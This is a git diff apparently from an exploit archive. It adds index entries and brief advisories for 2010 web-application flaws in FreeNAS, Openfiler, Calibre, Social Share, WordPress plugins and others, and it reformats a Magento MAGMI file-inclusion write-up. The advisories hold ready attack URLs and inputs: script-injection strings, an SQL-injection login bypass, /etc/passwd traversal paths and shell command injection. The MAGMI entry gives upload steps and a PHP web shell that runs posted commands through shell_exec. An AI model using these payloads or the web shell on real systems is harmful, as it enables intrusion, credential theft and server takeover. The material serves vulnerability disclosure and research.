diff --git a/files.csv b/files.csv index 5e498b1ff..117ccf165 100755 --- a/files.csv +++ b/files.csv @@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port 35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0 +35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 +35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0 +35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0 +35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 +35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0 +35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 +35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0 +35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 +35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 +35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 diff --git a/platforms/linux/remote/35132.txt b/platforms/linux/remote/35132.txt new file mode 100755 index 000000000..9a6bf4d27 --- /dev/null +++ b/platforms/linux/remote/35132.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/45537/info + +Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. + +Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application. + +http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26 +http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26 \ No newline at end of file diff --git a/platforms/php/webapps/35052.txt b/platforms/php/webapps/35052.txt index 39bd4602e..4f28a1d72 100755 --- a/platforms/php/webapps/35052.txt +++ b/platforms/php/webapps/35052.txt @@ -1,48 +1,58 @@ Exploit found date: 10/24/2014 -Security Researcher name: Parvinder Singh Bhasin +Security Researcher name: Parvinder Bhasin Contact info: parvinder.bhasin@gmail.com -twitter: @parvinderb - +twitter: @parvinderb - scorpio Currently tested version: -Magento version: Magento CE - 1.8 and newer versions -MAGMI version: v0.7.17a and greater +Magento version: Magento CE - 1.8 older +MAGMI version: v0.7.17a older -MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server. +Download software link: +Magento server: http://www.magentocommerce.com/download +MAGMI Plugin: +https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/ + +MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability +(RFI) which allows an attacker to upload essentially any PHP file (without +any sanity checks). This PHP file could then be used to skim credit card +data, rewrite files, run remote commands, delete files..etc. Essentially, +this gives attacker ability to execute remote commands on the vulnerable +server. -Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure. Steps to reproduce: 1. http:///magmi/web/magmi.php 2. Under upload new plugins: - click on "choose file" - MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed. - - evil.php: - - - - - "; - - if(function_exists('shell_exec')) { - $command=$_POST['command']; - $output = shell_exec("$command"); - echo "
$output
"; - } - } - else { - echo "
- - -
"; - } - ?> - -3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from: - http:///magmi/plugins/evil.php - - At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc. \ No newline at end of file +click on "choose file" +MAGento plugins are basically php file zipped. So create a php shell and +zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file +has been uploaded, it will say: Plugin packaged installed. + evil.php: + + + + + "; + + if(function_exists('shell_exec')) { + $command=$_POST['command']; + $output = shell_exec("$command"); + echo "
$output
"; + } +} +else { + echo "
+ + +
"; +} +?> + +3. Your malicious evil.php file is extracted now. All you then need to do +is just access the evil.php page from: +http:///magmi/plugins/evil.php + At this point you could really have access to the entire system. Download +any malware, install rootkits, skim credit card data ..etc.etc. diff --git a/platforms/php/webapps/35124.txt b/platforms/php/webapps/35124.txt new file mode 100755 index 000000000..8d153a074 --- /dev/null +++ b/platforms/php/webapps/35124.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/45522/info + +FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected. + +http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E + + +http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes \ No newline at end of file diff --git a/platforms/php/webapps/35125.txt b/platforms/php/webapps/35125.txt new file mode 100755 index 000000000..d5ae7e5a0 --- /dev/null +++ b/platforms/php/webapps/35125.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45523/info + +Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0 \ No newline at end of file diff --git a/platforms/php/webapps/35126.txt b/platforms/php/webapps/35126.txt new file mode 100755 index 000000000..f7de482b9 --- /dev/null +++ b/platforms/php/webapps/35126.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/45530/info + +Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Habari 0.6.5 is affected; other versions may be vulnerable as well. + +http://www.example.com/system/admin/dash_status.php?status_data[1]= +http://www.example.com/system/admin/dash_additem.php?additem_form= \ No newline at end of file diff --git a/platforms/php/webapps/35131.txt b/platforms/php/webapps/35131.txt new file mode 100755 index 000000000..824774a09 --- /dev/null +++ b/platforms/php/webapps/35131.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/45536/info + +Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +The following example input is available: + +Username: anytext' or verified=1# + +Password: arbitrary_text \ No newline at end of file diff --git a/platforms/php/webapps/35133.txt b/platforms/php/webapps/35133.txt new file mode 100755 index 000000000..c8f86902d --- /dev/null +++ b/platforms/php/webapps/35133.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/45539/info + +The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks. + +http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd +http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts +http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/35134.txt b/platforms/php/webapps/35134.txt new file mode 100755 index 000000000..e9c1dc5ec --- /dev/null +++ b/platforms/php/webapps/35134.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/45541/info + +ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected. + +
+'> + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35135.txt b/platforms/php/webapps/35135.txt new file mode 100755 index 000000000..7a69a3663 --- /dev/null +++ b/platforms/php/webapps/35135.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45545/info + +The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35136.txt b/platforms/php/webapps/35136.txt new file mode 100755 index 000000000..9c9e3fe5a --- /dev/null +++ b/platforms/php/webapps/35136.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/45548/info + +The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Accept Signups 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack \ No newline at end of file diff --git a/platforms/php/webapps/35137.txt b/platforms/php/webapps/35137.txt new file mode 100755 index 000000000..8aed50966 --- /dev/null +++ b/platforms/php/webapps/35137.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/45550/info + +Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +The following example input is available: + +Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer"); + +HTTP query ("Referer" field): + +Referer: http://www.example.com/\r\n[second new response] \ No newline at end of file diff --git a/platforms/windows/remote/35130.txt b/platforms/windows/remote/35130.txt new file mode 100755 index 000000000..6221946cf --- /dev/null +++ b/platforms/windows/remote/35130.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/45532/info + +Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks. + +Calibre 0.7.34 is vulnerable; other versions may also be affected. + + + + + +http://www.example.com/browse/search?query=